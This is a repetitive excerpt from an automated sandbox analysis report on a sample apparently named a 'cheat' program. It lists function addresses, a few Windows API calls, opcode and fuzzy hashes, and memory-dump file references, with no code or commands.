                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: 5d72f707d34c29d0ac9ea2f9fef22b92da3f9cf7349e389c1a9e7c8d1f70bfb6
                                                    • Instruction ID: e32a76146c15d5a238951fb068690a575ed1e508087f4f7593caddc47af8b60a
                                                    • Opcode Fuzzy Hash: 5d72f707d34c29d0ac9ea2f9fef22b92da3f9cf7349e389c1a9e7c8d1f70bfb6
                                                    • Instruction Fuzzy Hash: 7B516DB19007198FEB24CF59E9857AABBF4FB88314F28856AD815EB790D3749901CB70
                                                    Function 00CFB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00CFB16B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: ba7fbd8fb3793ccb2356f963706c51e84180694c7d260900c9e5ee1c55898eb1
                                                    • Instruction ID: 374d93913fa170cf59f66dc3d8f51d666895b394803f09179ec803cfe6eb0149
                                                    • Opcode Fuzzy Hash: ba7fbd8fb3793ccb2356f963706c51e84180694c7d260900c9e5ee1c55898eb1
                                                    • Instruction Fuzzy Hash: 37F017B9E003088FDB68CB18ED92AE973B5EB98315F104295D615D3390C3B0AE858E71
                                                    Function 00CF40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gj
                                                    • API String ID: 0-4203073231
                                                    • Opcode ID: 60041189281dd42e5f03023ce4b3bffa696bb4ea527ef8ccfd94a64c18916da0
                                                    • Instruction ID: aa801167f4961b7a3e473e4f72de979ab50bbf6d5ba8dab2865cde1bd9d6f1cf
                                                    • Opcode Fuzzy Hash: 60041189281dd42e5f03023ce4b3bffa696bb4ea527ef8ccfd94a64c18916da0
                                                    • Instruction Fuzzy Hash: 8BC13676A183418FC354CF29D88065AFBE1BFC8208F198D2DE998D7311D734A945CF96
                                                    Function 00D0F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00D0F3A5), ref: 00D0F9DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 6245d6280f518644c46258ca9b3ee8d68362a1f8b84541bc6103db0c41c5140f
                                                    • Instruction ID: 43242ded197a85ce7c5e08af2968f3c03ac6156bb71c22ab854926de01d090fd
                                                    • Opcode Fuzzy Hash: 6245d6280f518644c46258ca9b3ee8d68362a1f8b84541bc6103db0c41c5140f
                                                    • Instruction Fuzzy Hash:
                                                    Function 00D1C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: ab6131ff62daeda15a67fc7a243e38582bf45506438616f51db08398115c49e9
                                                    • Instruction ID: 187db010424dec599cf8e2b61f6565695298616900e7c08ed05dc2d659cbfd68
                                                    • Opcode Fuzzy Hash: ab6131ff62daeda15a67fc7a243e38582bf45506438616f51db08398115c49e9
                                                    • Instruction Fuzzy Hash: 30A02230202300CFC300CF30AF0C30E3BE8AA223E2308002AA808C0330EB3880B0AB20
                                                    Function 00D062CA Relevance: .8, Instructions: 829COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                    • Instruction ID: 8aa300dd6017692e7ddbe82fc5a3da67974f2320904eb09d8134eda4365364c8
                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                    • Instruction Fuzzy Hash: 9462D5716047849FCB25CF28C8907B9BBE1AF95304F08896DE8DE8B786D730E955CB25
                                                    Function 00D077EF Relevance: .8, Instructions: 817COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                    • Instruction ID: 18cb564170249ceb415e4765df26f1b1a0c5c4debbe40a00e5d209a7cef74607
                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                    • Instruction Fuzzy Hash: 2E62B671A083458FCB15CF28C8906B9BBE1BF95304F18896DE9DA8F386D730E945CB65
                                                    Function 00CFF461 Relevance: .7, Instructions: 694COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                    • Instruction ID: 28b9a3ded3da4e1d24b3172253060b22635a4a0a725f4b16ea606c2b411044ad
                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                    • Instruction Fuzzy Hash: 6E525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA59CB86
                                                    Function 00D07153 Relevance: .5, Instructions: 536COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c323ffb15e60b6d0ae6778d37c7f0b3425e6d09a354eb7764e7b57f1bc43c040
                                                    • Instruction ID: 05c4b15415f73d618ea137fbf6d8387f28476a2e0c382bd9c0f98ffcd44a9313
                                                    • Opcode Fuzzy Hash: c323ffb15e60b6d0ae6778d37c7f0b3425e6d09a354eb7764e7b57f1bc43c040
                                                    • Instruction Fuzzy Hash: CB12C2B1A087069FC718CF28C8907B9B7E0FB94304F14892DE99ACB680D374F995CB55
                                                    Function 00CFC426 Relevance: .5, Instructions: 454COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 529ee142d924428b8236a50f03b1fd22a6298bd7fa2e5222b3e1dc4e40b39f2a
                                                    • Instruction ID: e172d8a0a3fd0ec78134d9199587815dbcd47f952c41883e3e8239b03d90fc6d
                                                    • Opcode Fuzzy Hash: 529ee142d924428b8236a50f03b1fd22a6298bd7fa2e5222b3e1dc4e40b39f2a
                                                    • Instruction Fuzzy Hash: 93F1CB31A083099FC798CF28C6C463ABBE1EFC9314F145A2EF695C7256D730EA458B52
                                                    Function 00D06CDC Relevance: .3, Instructions: 343COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 53f0dfb2d3215306438a4cad40c361c6f2e70338d4a7697593c25f74089df16e
                                                    • Instruction ID: 96b49710816bd57638e9c2f816654c3c70e62d58dd7eb02131888e8350fca4f1
                                                    • Opcode Fuzzy Hash: 53f0dfb2d3215306438a4cad40c361c6f2e70338d4a7697593c25f74089df16e
                                                    • Instruction Fuzzy Hash: 9DD192B1A083458FDB14DF28C84475BBBE1EF89308F08456DF8899B282D774E955CB66
                                                    Function 00CFE9B7 Relevance: .3, Instructions: 320COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58ee13a44bc661eb1c951d3b38b7542eff7d40b75e5d7f05ed064e57659d6148
                                                    • Instruction ID: 6acd0808d68a0d007e42c71452852b7c1391965f32cdc06848d6a2be9b74d8dc
                                                    • Opcode Fuzzy Hash: 58ee13a44bc661eb1c951d3b38b7542eff7d40b75e5d7f05ed064e57659d6148
                                                    • Instruction Fuzzy Hash: B8E139755083949FC344CF29E89086ABFF0AF9A300F45495EF9D497392C335EA19DBA2
                                                    Function 00D04088 Relevance: .3, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                    • Instruction ID: e9d86464110949bad6873ca48f865d787c29e22a8a64abdd14f095bd28ab7a4c
                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                    • Instruction Fuzzy Hash: 8C9126F02003499BDB28EB78D891FBA77D5EB94300F14092DE79E872C2DAA49545C776
                                                    Function 00D043BF Relevance: .2, Instructions: 243COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction ID: a92be82d23623f1084cde1003c0148f55ffe7c8c4054c5beac3e705ec09d5d32
                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction Fuzzy Hash: 558123F17043465BDB28DE68C895FBD77D4AB94304F04092DEB8E8B2C2DAA0D9858776
                                                    Function 00D151C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b30966687a2ae5e96526122e437987892883a864cf294f426dfa3f7644b773e
                                                    • Instruction ID: 858c7ec3fd55cc27bb14fb1a2d166adda9f59896c0cc5a27da336aa6d7c75f4c
                                                    • Opcode Fuzzy Hash: 2b30966687a2ae5e96526122e437987892883a864cf294f426dfa3f7644b773e
                                                    • Instruction Fuzzy Hash: 32614666600F08F6DA345968B8957FE2394EBC2340F58051AE482DF289DEBDDDC28639
                                                    Function 00D14F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                    • Instruction ID: 1690a9213836ee364a564e487fc5ce4b13708cc3cf2d0942a68fb988922e881a
                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                    • Instruction Fuzzy Hash: F8510361654F44F7DB3549A8B556BFF23859F86300F1C0919E882DB28ACE1DEEC683B1
                                                    Function 00CFEFE2 Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eea7e34ea1d695fa916b38b03c71351597b8cdcc711ed1efbd0cd961b12eabfa
                                                    • Instruction ID: 6fdd5e8d26f25f81f3848605ce5c486673a5e6992c8c497565a9efc1818f4bd4
                                                    • Opcode Fuzzy Hash: eea7e34ea1d695fa916b38b03c71351597b8cdcc711ed1efbd0cd961b12eabfa
                                                    • Instruction Fuzzy Hash: DC51C2315083998AD712CF24C1804BEBFE0EE9A714F4949ADE5D95B243C231DB4BDB63
                                                    Function 00D000B7 Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95af6bec40c7aed29c76c894af2a26aafbccb62c314af77a2f43a301fd762a0d
                                                    • Instruction ID: 4e13a4aa97c75bc4b67b1389d84b4afc6af313dd6c4ae54d20d64757e4baa1c8
                                                    • Opcode Fuzzy Hash: 95af6bec40c7aed29c76c894af2a26aafbccb62c314af77a2f43a301fd762a0d
                                                    • Instruction Fuzzy Hash: A251E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB96
                                                    Function 00D03E0B Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
